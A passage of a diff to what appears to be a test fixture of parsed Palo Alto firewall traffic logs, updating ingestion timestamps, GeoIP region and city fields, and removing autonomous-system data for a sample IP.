"175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7373,7 +7108,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381900600Z", + "ingested": "2021-12-14T14:50:18.748412953Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", 
@@ -7398,26 +7133,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9130, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7513,7 +7243,7 @@ }, "event": { "duration": 2000000000, - "ingested": "2021-12-09T13:43:22.381904700Z", + "ingested": "2021-12-14T14:50:18.748413362Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7538,26 +7268,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 555, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -7653,7 +7378,7 @@ }, "event": { "duration": 512000000000, - "ingested": "2021-12-09T13:43:22.381909600Z", + "ingested": "2021-12-14T14:50:18.748413779Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7678,26 +7403,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7793,7 +7513,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381914100Z", + "ingested": "2021-12-14T14:50:18.748414115Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", 
@@ -7818,26 +7538,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7933,7 +7648,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381917700Z", + "ingested": "2021-12-14T14:50:18.748414463Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7958,26 +7673,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -8073,7 +7783,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381922200Z", + "ingested": "2021-12-14T14:50:18.748414823Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8098,26 +7808,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8213,7 +7918,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381927700Z", + "ingested": "2021-12-14T14:50:18.748415165Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", 
@@ -8238,26 +7943,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 40043, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8353,7 +8053,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381933Z", + "ingested": "2021-12-14T14:50:18.748415547Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8378,26 +8078,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -8493,7 +8188,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381936600Z", + "ingested": "2021-12-14T14:50:18.748415887Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8518,26 +8213,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8633,7 +8323,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381940400Z", + "ingested": "2021-12-14T14:50:18.748416248Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", 
@@ -8658,26 +8348,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8773,7 +8458,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381944600Z", + "ingested": "2021-12-14T14:50:18.748416594Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8798,26 +8483,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 906, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -8913,7 +8593,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381948800Z", + "ingested": "2021-12-14T14:50:18.748416936Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -8938,26 +8618,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 163, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9053,7 +8728,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381953400Z", + "ingested": "2021-12-14T14:50:18.748417299Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", 
@@ -9078,26 +8753,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9193,7 +8863,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381958800Z", + "ingested": "2021-12-14T14:50:18.748417642Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9218,26 +8888,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -9333,7 +8998,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381964500Z", + "ingested": "2021-12-14T14:50:18.748417987Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9358,26 +9023,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9473,7 +9133,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381969900Z", + "ingested": "2021-12-14T14:50:18.748418381Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", 
@@ -9498,26 +9158,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 922, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9613,7 +9268,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381975300Z", + "ingested": "2021-12-14T14:50:18.748418723Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9638,26 +9293,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -9753,7 +9403,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381980600Z", + "ingested": "2021-12-14T14:50:18.748419078Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9778,26 +9428,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9893,7 +9538,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381985900Z", + "ingested": "2021-12-14T14:50:18.748419428Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", 
@@ -9918,26 +9563,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10033,7 +9673,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381991100Z", + "ingested": "2021-12-14T14:50:18.748419776Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10058,26 +9698,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -10173,7 +9808,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381996500Z", + "ingested": "2021-12-14T14:50:18.748420117Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10198,26 +9833,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 26786, - "ip": "175.16.199.1", - "packets": 22 + "packets": 22, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10313,7 +9943,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382001800Z", + "ingested": "2021-12-14T14:50:18.748420478Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", 
@@ -10338,26 +9968,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -10453,7 +10078,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.382007400Z", + "ingested": "2021-12-14T14:50:18.748420962Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10478,26 +10103,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
